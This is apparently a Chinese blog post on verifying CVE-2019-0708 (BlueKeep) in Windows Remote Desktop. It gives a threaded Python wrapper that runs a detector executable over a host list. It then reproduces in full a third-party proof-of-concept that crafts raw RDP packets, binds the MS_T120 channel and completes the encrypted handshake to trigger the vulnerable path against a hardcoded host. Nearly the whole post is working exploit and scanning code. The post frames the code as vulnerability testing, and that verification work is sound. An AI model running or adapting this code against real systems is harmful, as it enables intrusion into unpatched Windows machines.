CVE-2019-0708

关于这个cve看了几天的cxk。等到到大佬发出了验证方式。特来验证一下。

人生苦短我用python

方法一

使用前几天360推出的exe

# _*_ coding: utf-8 _*_


"""
auth: bigger.wing
version: v1.0
function: cve-2019-0708漏洞检测
usage:
note: 借助于poc做检测, 3389_hosts为IP地址清单，0708detector.exe为poc
"""


import os
import subprocess
from multiprocessing.dummy import Pool as ThreadPool


current_abs_path = os.path.abspath(__file__)
current_abs_path_dir = os.path.dirname(current_abs_path)
poc = os.path.abspath(current_abs_path_dir) + '/0708detector.exe'


def cve_2019_0708(ip, port='3389'):
    command = poc + ' -t ' + ip + ' -p ' + port
    result = subprocess.getoutput(command)

    # print(command, '\n', result)

    if 'WARNING: SERVER IS VULNERABLE' in result:
        result = '%s 存在CVE-2019-0708漏洞' % ip
    else:
        result = '%s 不存在CVE-2019-0708漏洞' % ip

    print(result)


if __name__ == '__main__':
    rdp_hosts = []
    with open('3389_hosts', 'r') as f:
        data = f.readlines()
        for x in data:
            ip = x.strip()
            rdp_hosts.append(ip)

    pool = ThreadPool(10)
    pool.map(cve_2019_0708, rdp_hosts)

方法二

找了一个最终不是输出cxk的poc,好好研究研究

…… 算了 能用就行

    
"""
CVE-2019-0708
the worst PoC for just hitting vulnerable path | NOT DOS!!!!! by Mateusz Garncarek
Some documentation and code parts:
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/e78db616-689f-4b8a-8a99-525f7a433ee2
https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-RDPBCGR/%5bMS-RDPBCGR%5d.pdf
https://github.com/citronneur/rdpy
Note:
- this PoC is tested against only Windows XP x86 SP3
- Better connecting channels, now you can set up to 31 channels (Big thanks to anonymous contributor)
"""

import socket
import sys
import struct
import hashlib



def confirm_channel(s, number):
    """
    @param s: {sock} socket handle
    @param number: {int} channel count
    """
    if 0xec + number >= 0x100:
        packet = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00" + bytes([(number+3)%0x100]) + b"\x04" + bytes([(0xec + number)%0x100])
    else:
        packet = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00" + bytes([(number+3)%0x100]) + b"\x03" + bytes([0xec + number])
    s.send(packet)
    received_data = s.recv(1024)

    packet = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00" + bytes([(number+3)%0x100])  + b"\x03\xeb"
    s.send(packet)
    received_data = s.recv(1024)
    
    for i in range(0, number):
        if 0xec + i >= 0x100:
            packet = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00" + bytes([(number+3)%0x100])  + b"\x04" + bytes([(0xec + i)%0x100])
        else:
            packet = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00" + bytes([(number+3)%0x100])  + b"\x03" + bytes([0xec + i])
        s.send(packet)
        received_data = s.recv(1024)
        print('[Info] Confirm No.%d channel.' % i)


def macData(macSaltKey, data):
    """
    @see: http://msdn.microsoft.com/en-us/library/cc241995.aspx
    @param macSaltKey: {str} mac key
    @param data: {str} data to sign
    @return: {str} signature
    """
    sha1Digest = hashlib.sha1()
    md5Digest = hashlib.md5()
    
    #encode length
    dataLength = len(data)
    dataLength = struct.pack('<I',dataLength)
    
    b36 = b"\x36" * 40
    
    sha1Digest.update(macSaltKey)
    sha1Digest.update(b36)
    sha1Digest.update(dataLength)
    sha1Digest.update(data)
    
    sha1Sig = sha1Digest.digest()

    b5c = b"\x5c" * 48
    
    md5Digest.update(macSaltKey)
    md5Digest.update(b5c)
    md5Digest.update(sha1Sig)
    
    return md5Digest.digest()


def crypt(key, data):
    S = list(range(256))
    j = 0

    for i in list(range(256)):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]

    j = 0
    y = 0
    out = []

    for char in data:
        j = (j + 1) % 256
        y = (y + S[j]) % 256
        S[j], S[y] = S[y], S[j]

        
        out.append(chr(ord(char) ^ S[(S[j] + S[y]) % 256]))

    return ''.join(out)


def SaltedHash(Secret, I,client_random,server_random):
    md5 = hashlib.md5()
    sha1 = hashlib.sha1()

    Secretb = bytearray()
    Secretb.extend(map(ord, Secret))

    Ib = bytearray()
    Ib.extend(map(ord, I))

    client_randomb = bytearray()
    client_randomb.extend(map(ord, client_random))

    server_randomb = bytearray()
    server_randomb.extend(map(ord, server_random))
    
    sha1.update(Ib+Secretb+client_randomb+server_randomb)
    md5.update(Secretb+sha1.digest())
    return md5.digest()


def finalHash(key, client_random, server_random):
    """
    @summary: MD5(in0[:16] + in1[:32] + in2[:32])
    @param key: in 16
    @param random1: in 32
    @param random2: in 32
    @return MD5(in0[:16] + in1[:32] + in2[:32])
    """
    client_randomb = bytearray()
    client_randomb.extend(map(ord, client_random))
    server_randomb = bytearray()
    server_randomb.extend(map(ord, server_random))
    
    md5Digest = md5 = hashlib.md5()
    md5Digest.update(key)
    md5Digest.update(client_randomb)
    md5Digest.update(server_randomb)
    return md5Digest.digest()

#Hardcoded Client Info PDU
packet_to_encrypt = b""
packet_to_encrypt +=b"\x00\x00\x00\x00\x5B\x01\x01\x00\x00\x00\x08\x00\x08\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00"
packet_to_encrypt +=b"\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00\x00\x00\x00\x00\x02"
packet_to_encrypt +=b"\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet_to_encrypt +=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00"


client_random =  b""
client_random += b"\xff\xee\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
client_random += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff"


host = '192.168.195.131'
port = 3389


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


s.connect((host, port))

received_data = ""

packet1 = b"\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x01\x00\x00\x00"


s.send(packet1)
received_data  = s.recv(10024)


print("1st packet sent")

#Initial PDU with GCC Conference Create Request
PDU = "\x03\x00\x01\x70\x02\xF0\x80\x7F\x65\x82\x01\x64\x04\x01\x01\x04\x01"
PDU +="\x01\x01\x01\xFF\x30\x19\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01"
PDU +="\x01\x02\x01\x00\x02\x01\x01\x02\x02\xFF\xFF\x02\x01\x02\x30\x19\x02"
PDU +="\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01"
PDU +="\x02\x02\x04\x20\x02\x01\x02\x30\x1C\x02\x02\xFF\xFF\x02\x02\xFC\x17"
PDU +="\x02\x02\xFF\xFF\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xFF\xFF"
PDU +="\x02\x01\x02\x04\x82\x01\x03\x00\x05\x00\x14\x7C\x00\x01\x80\xFA\x00"
PDU +="\x08\x00\x10\x00\x01\xC0\x00\x44\x75\x63\x61\x80\xEC\x01\xC0\xD8\x00"
PDU +="\x04\x00\x08\x00\x00\x04\x20\x03\x01\xCA\x03\xAA\x09\x04\x00\x00\xCE"
PDU +="\x0E\x00\x00\x44\x00\x45\x00\x53\x00\x4B\x00\x54\x00\x4F\x00\x50\x00"
PDU +="\x2D\x00\x37\x00\x39\x00\x46\x00\x56\x00\x56\x00\x30\x00\x43\x00\x00"
PDU +="\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x00\x00\x00\x00"
PDU +="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU +="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU +="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU +="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xCA\x01\x00\x00\x00\x00\x00"
PDU +="\x18\x00\x0F\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU +="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU +="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU +="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
PDU +="\x00\x00\x00\x00\x00\x00\x00\x00\x03\xC0\x08\x00"




#number of channels
channel_num = 0x1F

PDU += "%c\x00\x00\x00" % channel_num


"""
channels(name + nullbytes + CHANNEL_DEF::options)
72 64 70 64 72 00 00 00 -> CHANNEL_DEF::name = "rdpdr"
00 00 80 80 -> CHANNEL_DEF::options = 0x80800000
0x80800000 = 0x80000000 | 0x00800000 = CHANNEL_OPTION_INITIALIZED | CHANNEL_OPTION_COMPRESS_RDP
"""
PDU += "rdpdr" + "\x00\x00\x00" + "\x00\x00\x80\x80"
#PDU += "rdpsnd"+"\x00\x00" + "\x00\x00\x00\xc0"
#PDU += "cliprdr"+ "\x00"+ "\x00\x00\xa0\xc0"
#PDU += "AAAAAAA" + "\x00" + "\x00\x00\x00\x80"
padding_channel = "AAAAAAAA"   + "\x41\x41\x41\x41"
PDU += padding_channel * (channel_num - 2)
PDU += "MS_T120" + "\x00" + "\x00\x00\x00\x80"
#PDU += "drdynvc"  + "\x00"+ "\x00\x00\x80\xc0"


PDU += "\x02\xc0\x0c\x00\x0b\x00\x00\x00\x00\x00\x00\x00"



length_packet = len(PDU)
print(length_packet)

#stupid calculating length for ASN.1 xD(now little bit better)
ber = length_packet-12
ber2  = length_packet-109
ber3  =  length_packet-118
ber4  =  length_packet-132
ber5 =   8+length_packet+(channel_num*12) - length_packet


length_packetb = struct.pack(">h", length_packet)

berb = length_packet = struct.pack(">h", ber)
ber2b  = length_packet = struct.pack(">h", ber2)
ber3b  =  length_packet = struct.pack(">h", ber3)
ber4b  = length_packet = struct.pack(">h", ber4)
ber5b =   length_packet = struct.pack(">h", ber5)




#worst calculating length for ASN.1 xD
PDU_b = bytearray()
PDU_b.extend(map(ord, PDU))

#print(hex(ber3b[0]+0x80))
#print(ord(ber3b[0])+hex(PDU_b[116]))

PDU_b[2] = length_packetb[0]
PDU_b[3] = length_packetb[1]
PDU_b[10] = berb[0]
PDU_b[11] = berb[1]
PDU_b[107] = ber2b[0]
PDU_b[108] = ber2b[1]
#Better hardcoded high part of length xDDDDDDDDd
PDU_b[116] = ber3b[0]+0x80
PDU_b[117] = ber3b[1] 
#Better hardcoded high part of length xDDDDDDDDd
PDU_b[130] = ber4b[0]+0x80
PDU_b[131] = ber4b[1]

PDU_b[351] = ber5b[0]
PDU_b[350] = ber5b[1]



s.send(PDU_b)
received_data = s.recv(1024)

#Now little bit better

if channel_num % 2 != 0:
    server_random = received_data[4+107+(2*channel_num):4+139+(2*channel_num)]
    modulus = received_data[4+175+(2*channel_num):4+239+(2*channel_num)]
    public_exponent =  received_data[4+171+(2*channel_num):4+175+(2*channel_num)]
else:
    server_random = received_data[2+107+(2*channel_num):2+139+(2*channel_num)]
    modulus = received_data[2+175+(2*channel_num):2+239+(2*channel_num)]
    public_exponent =  received_data[2+171+(2*channel_num):2+175+(2*channel_num)]


print("Initial PDU sent")

#Obtaining things for RSA 
modulus = int.from_bytes(modulus, byteorder='little')
public_exponent = int.from_bytes(public_exponent, byteorder='little')
client_random = int.from_bytes(client_random, byteorder='little')


#Encrypting client radom 

encrypted_client_random = pow(client_random,public_exponent,modulus )
encrypted_client_random  = encrypted_client_random.to_bytes(64, byteorder='little')


####Begin of connecting virtual channels, it's better now 
packet3 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00\x03\x00\x00\x08\x02\xf0\x80\x28"
s.send(packet3)
print("3rd packet sent")

received_data  = s.recv(1024)
#packet4 = b"\x03\x00\x00\x08\x02\xf0\x80\x28"
#s.send(packet4)
#received_data  = s.recv(1024)
#print("4th packet sent")

confirm_channel(s, channel_num)

###########End of connecting virtual channels


#Client Security Exchange PDU

PDU_Security_Exchange = b"\x03\x00\x00\x5e\x02\xf0\x80\x64\x00\x03\x03\xeb\x70\x50\x01\x00\x00\x00\x48\x00\x00\x00"
PDU_Security_Exchange += encrypted_client_random
PDU_Security_Exchange  += b"\x00\x00\x00\x00\x00\x00\x00\x00"


client_random  = client_random.to_bytes(32, byteorder='little')
client_random = "".join(map(chr, client_random))
server_random = "".join(map(chr, server_random))

#Calculating hashes and things for RC4 encryption it's only done for 128BIT RC4
PreMasterSecret = client_random[:24] + server_random[:24]
MasterSecret = SaltedHash(PreMasterSecret,"A",client_random,server_random) +  SaltedHash(PreMasterSecret,"BB",client_random,server_random) + SaltedHash(PreMasterSecret,"CCC",client_random,server_random)
MasterSecret = "".join(map(chr, MasterSecret))
SessionKeyBlob = SaltedHash(MasterSecret,"X",client_random,server_random) +  SaltedHash(MasterSecret,"YY",client_random,server_random) + SaltedHash(MasterSecret,"ZZZ",client_random,server_random)
FinalClientEncryptKey128 = SessionKeyBlob[32:48]
FinalClientEncryptKey128 = finalHash(FinalClientEncryptKey128,client_random,server_random)

print(':'.join(hex(x)[2:] for x in FinalClientEncryptKey128))

MACKey128 = SessionKeyBlob[:16]
FinalClientEncryptKey128 = "".join(map(chr, FinalClientEncryptKey128))
FinalMac128 = macData(MACKey128, packet_to_encrypt)[:8]
packet_to_encrypt = "".join(map(chr, packet_to_encrypt))
encrypted_packet = crypt(FinalClientEncryptKey128,packet_to_encrypt)
encrypted_packetb = bytearray()
encrypted_packetb.extend(map(ord, encrypted_packet))

#print(':'.join(hex(ord(x))[2:] for x in encrypted_packet))
 
#Client Info PDU together with #Client Security Exchange PDU
Client_Info_PDU =  b""
Client_Info_PDU += PDU_Security_Exchange
Client_Info_PDU += b"\x03\x00\x01\x05\x02\xf0\x80\x64\x00\x03\x03\xeb\x70\x80\xf6\x48\x00\x00\x00"
Client_Info_PDU += FinalMac128
Client_Info_PDU += encrypted_packetb

s.send(Client_Info_PDU)
received_data  = s.recv(1024)
print("Last packet sent")